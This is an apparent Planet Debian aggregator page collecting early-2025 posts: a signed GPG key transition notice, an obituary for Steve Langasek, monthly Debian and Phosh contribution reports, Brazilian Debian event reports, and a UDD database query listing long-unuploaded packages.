March 02, 2025

hackergotchi for Lisandro Damián Nicanor Pérez Meyer

Lisandro Damián Nicanor Pérez Meyer

PGP/GPG transition from 0x6286A7D0 to 0xB48C1072

I am currently transitioning my GPG/GPG key from D/4096 0x12DDFA84AC23B2BBF04B313CAB645F406286A7D0 to D/4096 0xA94C9FBFA49AA7CD4F40BB9F5E9030CCB48C1072.

Let's put this in plain text, signed with both keys:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

I am currently transitioning my GPG/GPG key from D/4096 0x12DDFA84AC23B2BBF04B313CAB645F406286A7D0 to D/4096 0xA94C9FBFA49AA7CD4F40BB9F5E9030CCB48C1072.

This file is first signed with the new key and then with the old one.

- -----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEqUyfv6Sap81PQLufXpAwzLSMEHIFAmfE6RwACgkQXpAwzLSM
EHJpUBAAwMAbOwGcRiuX/aBjqDMA9HerRgimNWE9xA35Asg3F+A5/AFrBo+BDng3
jviCGxR6YdicSLZptaScLuRnqG1i/OcochGDxvHYVQ9I/G9SuHB7ylqD7zDnO5pw
Lldwx9jovkszgXMC+vs1E9tQ4vpuWNQ1I7q90rdikywhvNdNs8XUSCUNCLol5fzm
u64hcKex3pwt7wYs6TxtgO5DLpp//5Z6NoZ5f/esC0837zqy5Py6+7scN3tgRmXj
SyALlhfOCsy4+v22K5xk0VNelEWUg+VKqgMjPYbEfGQ3e4LXId6gGlKF+OuXCJX5
Eqi2leO/O3c+1MZ8LMh3YQft1/TmYktASMTdwV7Y87qMgVkXsJqIvw8d9VNlZvET
B3MMsuPK9VNKCokbSiHwB2ZQR235Hq6LPrBfMPnoVb5QzUgIk8Kz92wM3NWVAjzE
oj/660SZ7SfbBi6qmQyMjYKSKN+kSZazQfoUZo0fK1Y1mywN/XkeeV+gq/ZiYPhI
QLbjEfoeHEVcufgQCU0PvUuKr/+ud8BAwdH/9YWxYnObAzXFxgOJ9AvDqKxbD+rw
MVXCU4xMtNHHDqgZ+pSdB0br/bYtIqh1YsFfHw16lUgj9lcmfnujhl+h700pob6d
oArO0Bjb0bM9PTRRAn3CMiz2UeerBzY6gvaSnO3oBQc/UAx3RgA=
=r9Sr
- -----END PGP SIGNATURE-----

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEEt36hKwjsrvwSzE8q2RfQGKGp9AFAmfE6U8ACgkQq2RfQGKG
p9DEWA/+N1AtaPwVGRi3OTcC+mzjjVd3oB4H4E80559FCbWQLvbnlazCTgdVHxp5
Pjlm4I/hKYSaWNirUvE7Dq7LNWYYhZRBunXc/VrrX2fkxj99D+F9co5fXYO3fsQn
vlz1UZzq8OrvWJo5Cv65CkblQReB31SNY//gBk5SjaeL4bnH3qOLCn6gGrqIgkyj
qb8vQzk9ssb0b2P2hNJlkYQA20LUshyShyfnaAJuEtmDYp3F3fWfuyTPEznJZ0AJ
efxfkYqQIznY36Om8dW0ec5LI3Xb+Obj4ccfNhWBfVG4RKruKHEhQCDtZbMSGPDn
ns4yOl5cqbN/2Gqa/Ww+LafWPsa73NYQNDOIM2XhVFLf2wikGMnb2bew3iZrEBo5
BORucyd1sBFsdD2tXAZEaXBpuCU+7mI9bJz9Co2+NWf1+IDaKyvJSgl7cQxuUtd4
tp7mDB7Czf4yDK+QHqeWY46DtU0dlDpyOt2IijkJzhH6nL9cfo+W4JUFJrhd42Tr
fRqjt7WeGrauX+d8wfvVV/KFrCkuw51ojLAtztvH7iwDP85wAOu95AlT1kT4ZwlE
uEmdgtYE3GGwQKP2osndJZwic/tZuKrm7p5xFYJr8N95nsRNlk1ia4EkyvQbe49m
2+JHO8Q0EjUGfV2+bSw4Eupi6qEgWp2s4sIGpHEGzWYfNqmozWE=
=A5kI
-----END PGP SIGNATURE-----

The above can be found as a file here.

02 March, 2025 11:16PM by Lisandro Damián Nicanor Pérez Meyer

hackergotchi for Jonathan McDowell

Jonathan McDowell

RIP: Steve Langasek

[I’d like to stop writing posts like this. I’ve been trying to work out what to say now for nearly 2 months (writing the mail to -private to tell the Debian project about his death is one of the hardest things I’ve had to write, and I bottled out and wrote something that was mostly just factual, because it wasn’t the place), and I’ve decided I just have to accept this won’t be the post I want it to be, but posted is better than languishing in drafts.]

Last weekend I was in Portland, for the Celebration of Life of my friend Steve, who sadly passed away at the start of the year. It wasn’t entirely unexpected, but that doesn’t make it any easier.

I’ve struggled to work out what to say about Steve. I’ve seen many touching comments from others in Debian about their work with him, but what that’s mostly brought home to me is that while I met Steve through Debian, he was first and foremost my friend rather than someone I worked with in Debian. And so everything I have to say is more about that friendship (and thus feels a bit self-centred).

My first memory of Steve is getting lost with him in Porto Alegre, Brazil, during DebConf4. We’d decided to walk to a local mall to meet up with some other folk (I can’t recall how they were getting there, but it wasn’t walking), ended up deep in conversation (ISTR it was about shared library transititions), and then it took a bit longer than we expected. I don’t know how that managed to cement a friendship (neither of us saw it as the near death experience others feared we’d had), but it did.

Unlike others I never texted Steve much; we’d occasionally chat on IRC, but nothing major. That didn’t seem to matter when we actually saw each other in person though, we just picked up like we’d seen each other the previous week. DebConf became a recurring theme of when we’d see each other. Even outside DebConf we went places together. The first time I went somewhere in the US that wasn’t the Bay Area, it was to Portland to see Steve. He, and his family, came to visit me in Belfast a couple of times, and I did road trip from Dublin to Cork with him. He took me to a volcano.

Steve saw injustice in the world and actually tried to do something about it. I still have a copy of the US constitution sitting on my desk that he gave me. He made me want to be a better person.

The world is a worse place without him in it, and while I am better for having known him, I am sadder for the fact he’s gone.

02 March, 2025 04:56PM

hackergotchi for Colin Watson

Colin Watson

Free software activity in February 2025

Most of my Debian contributions this month were sponsored by Freexian.

You can also support my work directly via Liberapay.

OpenSSH

OpenSSH upstream released 9.9p2 with fixes for CVE-2025-26465 and CVE-2025-26466. I got a heads-up on this in advance from the Debian security team, and prepared updates for all of testing/unstable, bookworm (Debian 12), bullseye (Debian 11), buster (Debian 10, LTS), and stretch (Debian 9, ELTS). jessie (Debian 8) is also still in ELTS for a few more months, but wasn’t affected by either vulnerability.

Although I’m not particularly active in the Perl team, I fixed a libnet-ssleay-perl build failure because it was blocking openssl from migrating to testing, which in turn was blocking the above openssh fixes.

I also sent a minor sshd -T fix upstream, simplified a number of autopkgtests using the newish Restrictions: needs-sudo facility, and prepared for removing the obsolete slogin symlink.

PuTTY

I upgraded to the new upstream version 0.83.

GCC 15 build failures

I fixed build failures with GCC 15 in a few packages:

Python team

A lot of my Python team work is driven by its maintainer dashboard. Now that we’ve finished the transition to Python 3.13 as the default version, and inspired by a recent debian-devel thread started by Santiago, I thought it might be worth spending a bit of time on the “uscan error” section. uscan is typically scraping upstream web sites to figure out whether new versions are available, and so it’s easy for its configuration to become outdated or broken. Most of this work is pretty boring, but it can often reveal situations where we didn’t even realize that a Debian package was out of date. I fixed these packages:

  • cssutils (this in particular was very out of date due to a new and active upstream maintainer since 2021)
  • django-assets
  • django-celery-email
  • django-sass
  • django-yarnpkg
  • json-tricks
  • mercurial-extension-utils
  • pydbus
  • pydispatcher
  • pylint-celery
  • pyspread
  • pytest-pretty
  • python-apptools
  • python-django-libsass (contributed a packaging fix upstream in passing)
  • python-django-postgres-extra
  • python-django-waffle
  • python-ephemeral-port-reserve
  • python-ifaddr
  • python-log-symbols
  • python-msrest
  • python-msrestazure
  • python-netdisco
  • python-pathtools
  • python-user-agents
  • sinntp
  • wchartype

I upgraded these packages to new upstream versions:

  • cssutils (contributed a packaging tweak upstream)
  • django-iconify
  • django-sass
  • domdf-python-tools
  • extra-data (fixing a numpy 2.0 failure)
  • flufl.i18n
  • json-tricks
  • jsonpickle
  • mercurial-extension-utils
  • mod-wsgi
  • nbconvert
  • orderly-set
  • pydispatcher (contributed a Python 3.12 fix upstream)
  • pylint
  • pytest-rerunfailures
  • python-asyncssh
  • python-box (contributed a packaging fix upstream)
  • python-charset-normalizer
  • python-django-constance
  • python-django-guid
  • python-django-pgtrigger
  • python-django-waffle
  • python-djangorestframework-simplejwt
  • python-formencode
  • python-holidays (contributed a test fix upstream)
  • python-legacy-cgi
  • python-marshmallow-polyfield (fixing a test failure)
  • python-model-bakery
  • python-mrcz (fixing a numpy 2.0 failure)
  • python-netdisco
  • python-npe2
  • python-persistent
  • python-pkginfo (fixing a test failure)
  • python-proto-plus
  • python-requests-ntlm
  • python-roman
  • python-semantic-release
  • python-setproctitle
  • python-stdlib-list
  • python-trustme
  • python-typeguard (fixing a test failure)
  • python-tzlocal
  • pyzmq
  • setuptools-scm
  • sqlfluff
  • stravalib
  • tomopy
  • trove-classifiers
  • xhtml2pdf (fixing CVE-2024-25885)
  • xonsh
  • zodbpickle
  • zope.deprecation
  • zope.testrunner

In bookworm-backports, I updated python-django to 3:4.2.18-1 (issuing BSA-121) and added new backports of python-django-dynamic-fixture and python-django-pgtrigger, all of which are dependencies of debusine.

I went through all the build failures related to python-click 8.2.0 (which was confusingly tagged but not fully released upstream and posted an analysis.

I fixed or helped to fix various other build/test failures:

I dropped support for the old setup.py ftest command from zope.testrunner upstream.

I fixed various odds and ends of bugs:

Installer team

Following up on last month, I merged and uploaded Helmut’s /usr-move fix.

02 March, 2025 01:49PM by Colin Watson

March 01, 2025

hackergotchi for Debian Brasil

Debian Brasil

MiniDebConf Belo Horizonte 2024 - a brief report


title: MiniDebConf Belo Horizonte 2024 - a brief report description: by Paulo Henrique de Lima Santana (phls) published: true date: 2025-03-01T17:40:50.904Z tags: blog, english editor: markdown

dateCreated: 2024-06-06T09:00:00.000Z

From April 27th to 30th, 2024, MiniDebConf Belo Horizonte 2024 was held at the Pampulha Campus of UFMG - Federal University of Minas Gerais, in Belo Horizonte city.

MiniDebConf BH 2024 banners This was the fifth time that a MiniDebConf (as an exclusive in-person event about Debian) took place in Brazil. Previous editions were in Curitiba (2016, 2017, and 2018), and in Brasília 2023. We had other MiniDebConfs editions held within Free Software events such as FISL and Latinoware, and other online events. See our event history.

Parallel to MiniDebConf, on 27th (Saturday) FLISOL - Latin American Free Software Installation Festival took place. It's the largest event in Latin America to promote Free Software, and It has been held since 2005 simultaneously in several cities.

MiniDebConf Belo Horizonte 2024 was a success (as were previous editions) thanks to the participation of everyone, regardless of their level of knowledge about Debian. We value the presence of both beginner users who are familiarizing themselves with the system and the official project developers. The spirit of welcome and collaboration was present during all the event.

MiniDebConf BH 2024 flisol

2024 edition numbers

During the four days of the event, several activities took place for all levels of users and collaborators of the Debian project. The official schedule was composed of:

  • 06 rooms in parallel on Saturday;
  • 02 auditoriums in parallel on Monday and Tuesday;
  • 30 talks/BoFs of all levels;
  • 05 workshops for hands-on activities;
  • 09 lightning talks on general topics;
  • 01 Live Electronics performance with Free Software;
  • Install fest to install Debian on attendees' laptops;
  • BSP (Bug Squashing Party);
  • Uploads of new or updated packages.

MiniDebConf BH 2024 palestra The final numbers for MiniDebConf Belo Horizonte 2024 show that we had a record number of participants.

  • Total people registered: 399
  • Total attendees in the event: 224

Of the 224 participants, 15 were official Brazilian contributors, 10 being DDs (Debian Developers) and 05 (Debian Maintainers), in addition to several unofficial contributors.

The organization was carried out by 14 people who started working at the end of 2023, including Prof. Loïc Cerf from the Computing Department who made the event possible at UFMG, and 37 volunteers who helped during the event.

As MiniDebConf was held at UFMG facilities, we had the help of more than 10 University employees.

See the list with the names of people who helped in some way in organizing MiniDebConf Belo Horizonte 2024.

The difference between the number of people registered and the number of attendees in the event is probably explained by the fact that there is no registration fee, so if the person decides not to go to the event, they will not suffer financial losses.

The 2024 edition of MiniDebconf Belo Horizonte was truly grand and shows the result of the constant efforts made over the last few years to attract more contributors to the Debian community in Brazil. With each edition the numbers only increase, with more attendees, more activities, more rooms, and more sponsors/supporters.

MiniDebConf BH 2024 grupo

MiniDebConf BH 2024 grupo

Activities

The MiniDebConf schedule was intense and diverse. On the 27th, 29th and 30th (Saturday, Monday and Tuesday) we had talks, discussions, workshops and many practical activities.

MiniDebConf BH 2024 palestra On the 28th (Sunday), the Day Trip took place, a day dedicated to sightseeing around the city. In the morning we left the hotel and went, on a chartered bus, to the Belo Horizonte Central Market. People took the opportunity to buy various things such as cheeses, sweets, cachaças and souvenirs, as well as tasting some local foods.

MiniDebConf BH 2024 mercado After a 2-hour tour of the Market, we got back on the bus and hit the road for lunch at a typical Minas Gerais food restaurant.

MiniDebConf BH 2024 palestra With everyone well fed, we returned to Belo Horizonte to visit the city's main tourist attraction: Lagoa da Pampulha and Capela São Francisco de Assis, better known as Igrejinha da Pampulha. MiniDebConf BH 2024 palestra We went back to the hotel and the day ended in the hacker space that we set up in the events room for people to chat, packaging, and eat pizzas.

MiniDebConf BH 2024 palestra

Crowdfunding

For the third time we ran a crowdfunding campaign and it was incredible how people contributed! The initial goal was to raise the amount equivalent to a gold tier of R$ 3,000.00. When we reached this goal, we defined a new one, equivalent to one gold tier + one silver tier (R$ 5,000.00). And again we achieved this goal. So we proposed as a final goal the value of a gold + silver + bronze tiers, which would be equivalent to R$ 6,000.00. The result was that we raised R$7,239.65 (~ USD 1,400) with the help of more than 100 people!

Thank you very much to the people who contributed any amount. As a thank you, we list the names of the people who donated. MiniDebConf BH 2024 doadores

Food, accommodation and/or travel grants for participants

Each edition of MiniDebConf brought some innovation, or some different benefit for the attendees. In this year's edition in Belo Horizonte, as with DebConfs, we offered bursaries for food, accommodation and/or travel to help those people who would like to come to the event but who would need some kind of help.

In the registration form, we included the option for the person to request a food, accommodation and/or travel bursary, but to do so, they would have to identify themselves as a contributor (official or unofficial) to Debian and write a justification for the request.

Number of people benefited:

  • Food: 69
  • Accommodation: 20
  • Travel: 18

The food bursary provided lunch and dinner every day. The lunches included attendees who live in Belo Horizonte and the region. Dinners were paid for attendees who also received accommodation and/or travel. The accommodation was held at the BH Jaraguá Hotel. And the travels included airplane or bus tickets, or fuel (for those who came by car or motorbike).

Much of the money to fund the bursaries came from the Debian Project, mainly for travels. We sent a budget request to the former Debian leader Jonathan Carter, and He promptly approved our request.

In addition to this event budget, the leader also approved individual requests sent by some DDs who preferred to request directly from him.

The experience of offering the bursaries was really good because it allowed several people to come from other cities.

MiniDebConf BH 2024 grupo

Photos and videos

You can watch recordings of the talks at the links below:

Thanks

We would like to thank all the attendees, organizers, volunteers, sponsors and supporters who contributed to the success of MiniDebConf Belo Horizonte 2024.

MiniDebConf BH 2024 grupo

Sponsors

Gold:

Silver:

Bronze:

Organizers

01 March, 2025 05:40PM

Debian Day 2024 in Santa Maria - Brazil


title: Debian Day 2024 in Santa Maria - Brazil description: by Andrew Gonçalves published: true date: 2025-03-01T17:39:21.458Z tags: blog, english editor: markdown

dateCreated: 2024-08-20T13:00:00.000Z

by por Andrew Gonçalves

Debian Day in Santa Maria - RS 2024 was held after a 5-year hiatus from the previous version of the event. It took place on the morning of August 16, in the Blue Hall of the Franciscan University (UFN) with support from the Debian community and the Computing Practices Laboratory of UFN.

The event was attended by students from all semesters of the Computer Science, Digital Games and Informational Systems, where we had the opportunity to talk to the participants.

Around 60 students attended a lecture introducing them to Free and Open Source Software, Linux and were introduced to the Debian project, both about the philosophy of the project and how it works in practice and the opportunities that have opened up for participants by being part of Debian.

After the talk, a packaging demonstration was given by local DD Francisco Vilmar, who demonstrated in practice how software packaging works in Debian.

I would like to thank all the people who helped us:

  • Debian Project
  • Professor Ana Paula Canal (UFN)
  • Professor Sylvio André Garcia (UFN)
  • Laboratory of Computing Practices
  • Francisco Vilmar (local DD)

And thanks to all the participants who attended this event asking intriguing questions and taking an interest in the world of Free Software.

Photos:

DD em Santa Maria 1 DD em Santa Maria 2 DD em Santa Maria 3 DD em Santa Maria 4

01 March, 2025 05:39PM

Debian Day 2024 in Pouso Alegre - Brazil


title: Debian Day 2024 in Pouso Alegre - Brazil description: by Thiago Pezzo (Tico), Giovani Ferreira published: true date: 2025-03-01T17:39:17.026Z tags: blog, english editor: markdown

dateCreated: 2024-08-18T15:00:00.000Z

by Thiago Pezzo and Giovani Ferreira

Local celebrations of Debian 2024 Day also happened on [Pouso Alegre, MG, Brazil] (https://www.openstreetmap.org/relation/315431). In this year we managed to organize two days of lectures!

On the 14th of August 2024, Wednesday morning, we were on the [Federal Institute of Education, Science and Technology of the South of Minas Gerais] (https://portal.ifsuldeminas.edu.br/index.php), (IFSULDEMINAS), Pouso Alegre campus. We did an introductory presentation of the Project Debian, operating system and community, for the three years of the Technical Course in Informatics (professional high school). The event was closed to IFSULDEMINAS students and talked to 60 people.

On August 17th, 2024, a Saturday morning, we held the event open to the community at the University of the Sapucaí Valley (Univás), with institutional support of the Information Systems Course. We speak about the Debian Project with Giovani Ferreira (Debian Developer); about the Debian pt_BR translation team with Thiago Pezzo; about everyday experiences using free software with Virginia Cardoso; and on how to set up a development environment ready for production using Debian and Docker with Marcos António dos Santos. After the lectures, snacks, coffee and cake were served, while the participants talked, asked questions and shared experiences.

We would like to thank all the people who have helped us:

  • Michelle Nery (IFSULDEMINAS) and André Martins (UNIVÁS) for the aid in the local organization - Paulo Santana (Debian Brazil) by the general organization
  • Virginia Cardoso, Giovani Ferreira, Marco António and Thiago Pezzo for the lectures - And a special thanks to all of you who participated in our celebratio

Some pictures from Pouso Alegre:

Presentation at IFSULDEMINAS Pouso Alegre campus 1 Presentation at IFSULDEMINAS Pouso Alegre campus 2 Presentation at UNIVÁS Fátima campus 1 Presentation at UNIVÁS Fátima campus 2 Presentation at UNIVÁS Fátima campus 3 Presentation at UNIVÁS Fátima campus 4

01 March, 2025 05:39PM

Debian Day 30 years in São Carlos - Brazil


title: Debian Day 30 years in São Carlos - Brazil description: by Carlos Henrique Lima Melara (Charles) published: true date: 2025-03-01T17:39:05.750Z tags: blog, english editor: markdown

dateCreated: 2023-08-20T20:00:00.000Z

This year's Debian day was a pretty special one, we are celebrating 30 years! Giving the importance of this event, the Brazilian community planned a very special week. Instead of only local gatherings, we had a week of online talks streamed via Debian Brazil's youtube channel (soon the recordings will be uploaded to Debian's peertube instance). Nonetheless the local celebrations happened around the country and I've organized one in São Carlos with the help of GELOS, the FLOSS group at University of São Paulo. The event happened on August 19th and went on the whole afternoon. We had some talks about Debian and free software (see table below), a coffee break where we had the chance to talk, and finished with a group photo (check this one and many others below). Actually, it wasn't the end, we carried on the conversation about Debian and free software in a local bar :-)

We had around 30 people in the event and reached a greater audience via the announcements across the university's press releases and emails sent to our Brazilian mailing lists. You can check some of them below.

Time | Author | Title -----|--------|------ 14:10 | GELOS | Intro to GELOS 14:30 | Carlos Melara (Charles) | A ~~not so~~ Brief Introdution to the Debian Project 15:15 | Guilherme Paixão | Debian and the Free Culture 15:45 | zé | Free Software: the paths to a free life 16:15 | -- | Coffee Break 17:15 | Prof. Dr. Francisco José Monaco | The FOSS Ecosystem and You

Here are some photos taken during the event!

Preparation for Debian Day Getting things ready for the event.

Intro to GELOS Intro to GELOS talk.

Debian intro A ~~not so~~ Brief Introdution to the Debian Project talk.

Everyone knows Debian Everyone already knew Debian!

Free software Debian and the Free Culture talk

Auditorium People in the auditorium space.

Free software Free Software: the paths to a free life talk

Coffee Break Coffee Break.

FOSS Ecosystem The FOSS Ecosystem and You talk.

Group photo Group photo.

Celebration afterwards Celebration goes on in the bar.

01 March, 2025 05:39PM

Debian Day 30 years online in Brazil


title: Debian Day 30 years online in Brazil description: by Paulo Henrique de Lima Santana (phls) published: true date: 2025-03-01T17:39:03.284Z tags: blog, english editor: markdown

dateCreated: 2023-08-25T16:00:00.000Z

In 2023 the traditional Debian Day is being celebrated in a special way, after all on August 16th Debian turned 30 years old!

To celebrate this special milestone in the Debian's life, the Debian Brasil community organized a week with talks online from August 14th to 18th. The event was named Debian 30 years.

Two talks were held per night, from 7:00 pm to 10:00 pm, streamed on the Debian Brasil channel on YouTube totaling 10 talks. The recordings are also available on the Debian Brazil channel on Peertube. We had the participation of 9 DDs, 1 DM, 3 contributors in 10 activities. The live audience varied a lot, and the peak was on the preseed talk with Eriberto Mota when we had 47 people watching.

Thank you to all participants for the contribution you made to the success of our event.

  • Antonio Terceiro
  • Aquila Macedo
  • Charles Melara
  • Daniel Lenharo de Souza
  • David Polverari
  • Eriberto Mota
  • Giovani Ferreira
  • Jefferson Maier
  • Lucas Kanashiro
  • Paulo Henrique de Lima Santana
  • Sergio Durigan Junior
  • Thais Araujo
  • Thiago Andrade

Veja abaixo as fotos de cada atividade:

Nova geração: uma entrevista com iniciantes no projeto Debian Nova geração: uma entrevista com iniciantes no projeto Debian

Instalação personalizada e automatizada do Debian com preseed Instalação personalizada e automatizada do Debian com preseed

Manipulando patches com git-buildpackage Manipulando patches com git-buildpackage

debian.social: Socializando Debian do jeito Debian debian.social: Socializando Debian do jeito Debian

Proxy reverso com WireGuard Proxy reverso com WireGuard

Celebração dos 30 anos do Debian! Celebração dos 30 anos do Debian!

Instalando o Debian em disco criptografado com LUKS Instalando o Debian em disco criptografado com LUKS

O que a equipe de localização já conquistou nesses 30 anos O que a equipe de localização já conquistou nesses 30 anos

Debian - Projeto e Comunidade! Debian - Projeto e Comunidade!

Design Gráfico e Software livre, o que fazer e por onde começar Design Gráfico e Software livre, o que fazer e por onde começar

01 March, 2025 05:39PM

hackergotchi for Guido Günther

Guido Günther

Free Software Activities February 2025

Another short status update of what happened on my side last month. One larger blocks are the Phosh 0.45 release, also reviews took a considerable amount of time. From the fun side debugging bananui and coming up with a fix in phoc as well as setting up a small GSM network using osmocom to test more Cell Broadcast thingies were likely the most fun parts.

phosh

  • Release 0.45~beta1, 0.45~rc1, 0.45.0
  • Don't hide player when track is stopped (MR) - helps with e.g. Shortwave
  • Fetch cover art via http (MR)
  • Update CI images (MR)
  • Robustify symbol file generation (MR)
  • Handle cutouts in the indicators area (MR)
  • Reduce flicker when opening overview (MR)
  • Select less noisy default background (MR)

phoc

  • Release 0.45~beta1, 0.45~rc1, 0.45.0
  • Add support for ext-foreign-toplevel-v1 (MR)
  • Keep wlroots-0.19.x in shape and add support for ext-image-copy-capture-v1 (MR)
  • Fix geometry with scale when rendering to a buffer (MR)
  • Allow to tweak log domains at runtime (MR)
  • Print more useful information on startup (MR)
  • Provide PID of toplevel for phosh (MR)
  • Improve detection for hardware keyboards (MR) (mostly to help bananui)
  • Make tests a bit more flexible (MR)
  • Use wlr_damage_ring_rotate_buffer (MR). Another prep for 0.19.x.
  • Support wp-alpha-modifier-v1 protocol (MR)

phosh-osk-stub

phosh-tour

phosh-mobile-settings

pfs

  • Add common checks and check meson files (MR)

libphosh-rs

meta-phosh

  • Add common dot files and job to check meson formatting (MR)
  • Add l10n modules to string freeze announcement (based on suggestion by Alexandre Franke) (MR)
  • Bring over mk-gitlab-rel and improve it for alpha, beta, RCs (MR)

libcmatrix

Debian

  • Upload phoc 0.45~beta1, 0.45~rc1, 0.45.0
  • Upload phosh 0.45~beta1, 0.45~rc1, 0.45.0
  • Uplaod feedbackd 0.7.0
  • Upload xdg-desktop-portal-phosh 0.45.0
  • Upload phosh-tour 0.45~rc1, 0.45.0
  • Upload phosh-osk-stub 0.45~rc1, 0.45.0
  • Upload phosh-mobile-settings 0.45~rc1, 0.45.0
  • phosh: Fix dependencies of library dev package (MR) (and add a test)
  • Update libphosh-rs to 0.0.6 (MR)
  • Update iio-sensor-proxy to 3.6 (MR)
  • Backport qbootctl RDONLY patch (MR) to make generating the boot image more robust
  • libssc: Update to 0.2.1 (MR)
  • dom-tools: Write errors to stderr (MR)
  • dom-tools: Use underscored version to drop the branch ~ (MR)
  • libmbim: Upload 1.31.6 to experimental (MR)
  • ModemManager: Upload 1.23.12 to experimental (MR)

gmobile

  • data: Add display-panel for Furilabs FLX1 (MR)

feedbackd

grim

  • Allow to force screen capture protocol (MR)

Wayland protocols

  • Address multiple rounds of review comments in the xdg-occlusion (now xdg-cutouts) protocol (MR)

g4music

  • Set prefs parent (MR)

wlroots

  • Backport touch up fix to 0.18 (MR)

qbootctl

  • Don't recreate all partitions on read operations (MR)

bananui-shell

  • Check for keyboard caps before using them (Patch, issue)

libssc

  • Allow for python3 as interpreter as well (MR)
  • Don't leak unprefixed symbols into ABI (MR)
  • Improve info on test failures (MR)
  • Support mutiarch when loading libqrtr (MR)

ModemManager

  • Cell Broadcast: Allow to set channel list via API (MR)

Waycheck

  • Add Phosh's protocols (MR)

Bug reports

  • Support haptic feedback on Linux in Firefox (Bug)
  • Get pmOS to boot again on Nokia 2780 (Bug)

Reviews

This is not code by me but reviews on other peoples code. The list is a slightly incomplete. Thanks for the contributions!

  • Debian: qcom-phone-utils rework (MR)
  • Simplify ui files (MR) - partially merged
  • calls: Implement ussd interface for ofono (MR)
  • chatty: Build docs using gi-docgen (MR)
  • chatty: Search related improvements (MR)
  • chatty: Fix crash on stuck SMS removal (MR)
  • feedbackd: stop flash when "prefer flash" is disabled (MR) - merged
  • gmobile: Support for nothingphone notch (MR)
  • iio-sensor-proxy: polkit for compass (MR) - merged
  • libcmatrix: Improved error code (MR) - merged
  • libcmatrix: Load room members is current (MR) - merged
  • libcmatrix: Start 0.0.4 cycle (MR) - merged
  • libhosh-rs: Update to 0.45~rc1 (MR) - merged
  • libphosh-rs: Update to reduced API surface (MR) - merged
  • phoc: Use color-rect for shields: (MR) - merged
  • phoc: unresponsive toplevel state (MR)
  • phoc: view: Don't multiply by scale in get_geometry_default (MR)
  • phoc: render: Fix subsurface scaling when rendering to buffer (MR)
  • phoc: render: Avoid rendering textures with alpha set to zero (MR)
  • phoc: Render a spinner on output shield (MR)
  • phosh: Manage libpohsh API version separately (MR) - merged
  • phosh: Prepare container APIs for GTK4 (MR)
  • phosh: Reduce API surface further (MR) - merged
  • phosh: Simplify UI files for GTK4 migration (MR) - merged
  • phosh: Simplify gvc-channel bar (MR) - merged
  • phosh: Simplify parent lookup (MR) - merged
  • phosh: Split out private header for LF (MR) - merged
  • phosh: Use symbols file for libphosh (MR) - merged
  • phosh: stylesheet: Improve legibility of app grid and top bar (MR)
  • several mobile-broadband-provider-info updates under (MR) - mostly merged

Help Development

If you want to support my work see donations.

Comments?

Join the Fediverse thread

01 March, 2025 01:38PM

Michael Ablassmeier

pbsav - scan backups on proxmox backup server via clamav

Little side project this weekend:

pbsav

Small utility to scan virtual machine backups on PBS via clamav.

01 March, 2025 12:00AM

February 28, 2025

Petter Reinholdtsen

Brushing up on old packages in Xiph and Debian

Since my motivation boost in the beginning of the month caused me to wrap up a new release of liboggz, I have used the same boost to wrap up new editions of libfishsound, liboggplay and libkate too. These have been tagged in upstream git, but not yet published on the Xiph download location. I am waiting for someone with access to have time to move the tarballs there, I hope it will happen in a few days. The same is the case for a minor update of liboggz too.

As I was looking at Xiph packages lacking updates, it occurred to me that there are packages in Debian that have not received a new upload in a long time. Looking for a way to identify them, I came across the ltnu script from the devscripts package. It can sort by last update, packages maintained by a single user/group, and is useful to figure out which packages a single maintainer should have a look at. But I wanted a archive wide summary. Based on the UDD SQL query used by ltnu, I ended up with the following command:

#!/bin/sh
env PGPASSWORD=udd-mirror psql --host=udd-mirror.debian.net --user=udd-mirror udd --command="
select source,
       max(version) as ver,
       max(date) as uploaded
from upload_history
where distribution='unstable' and
      source in (select source
                 from sources
                 where release='sid')
group by source
order by max(date) asc
limit 50;"

This will sort all source packages in Debian by upload date, and list the 50 oldest ones. The end result is a list of packages I suspect could use some attention:

           source            |           ver           |        uploaded        
-----------------------------+-------------------------+------------------------
 xserver-xorg-video-ivtvdev  | 1.1.2-1                 | 2011-02-09 22:26:27+00
 dynamite                    | 0.1.1-2                 | 2011-04-30 16:47:20+00
 xkbind                      | 2010.05.20-1            | 2011-05-02 22:48:05+00
 libspctag                   | 0.2-1                   | 2011-09-22 18:47:07+00
 gromit                      | 20041213-9              | 2011-11-13 21:02:56+00
 s3switch                    | 0.1-1                   | 2011-11-22 15:47:40+00
 cd5                         | 0.1-3                   | 2011-12-07 21:19:05+00
 xserver-xorg-video-glide    | 1.2.0-1                 | 2011-12-30 16:50:48+00
 blahtexml                   | 0.9-1.1                 | 2012-04-25 11:32:11+00
 aggregate                   | 1.6-7                   | 2012-05-01 00:47:11+00
 rtfilter                    | 1.1-4                   | 2012-05-11 12:50:00+00
 sic                         | 1.1-5                   | 2012-05-11 19:10:31+00
 kbdd                        | 0.6-4                   | 2012-05-12 07:33:32+00
 logtop                      | 0.4.3-1                 | 2012-06-05 23:04:20+00
 gbemol                      | 0.3.2-2                 | 2012-06-26 17:03:11+00
 pidgin-mra                  | 20100304-1              | 2012-06-29 23:07:41+00
 mumudvb                     | 1.7.1-1                 | 2012-06-30 09:12:14+00
 libdr-sundown-perl          | 0.02-1                  | 2012-08-18 10:00:07+00
 ztex-bmp                    | 20120314-2              | 2012-08-18 19:47:55+00
 display-dhammapada          | 1.0-0.1                 | 2012-12-19 12:02:32+00
 eot-utils                   | 1.1-1                   | 2013-02-19 17:02:28+00
 multiwatch                  | 1.0.0-rc1+really1.0.0-1 | 2013-02-19 17:02:35+00
 pidgin-latex                | 1.5.0-1                 | 2013-04-04 15:03:43+00
 libkeepalive                | 0.2-1                   | 2013-04-08 22:00:07+00
 dfu-programmer              | 0.6.1-1                 | 2013-04-23 13:32:32+00
 libb64                      | 1.2-3                   | 2013-05-05 21:04:51+00
 i810switch                  | 0.6.5-7.1               | 2013-05-10 13:03:18+00
 premake4                    | 4.3+repack1-2           | 2013-05-31 12:48:51+00
 unagi                       | 0.3.4-1                 | 2013-06-05 11:19:32+00
 mod-vhost-ldap              | 2.4.0-1                 | 2013-07-12 07:19:00+00
 libapache2-mod-ldap-userdir | 1.1.19-2.1              | 2013-07-12 21:22:48+00
 w9wm                        | 0.4.2-8                 | 2013-07-18 11:49:10+00
 vish                        | 0.0.20130812-1          | 2013-08-12 21:10:37+00
 xfishtank                   | 2.5-1                   | 2013-08-20 17:34:06+00
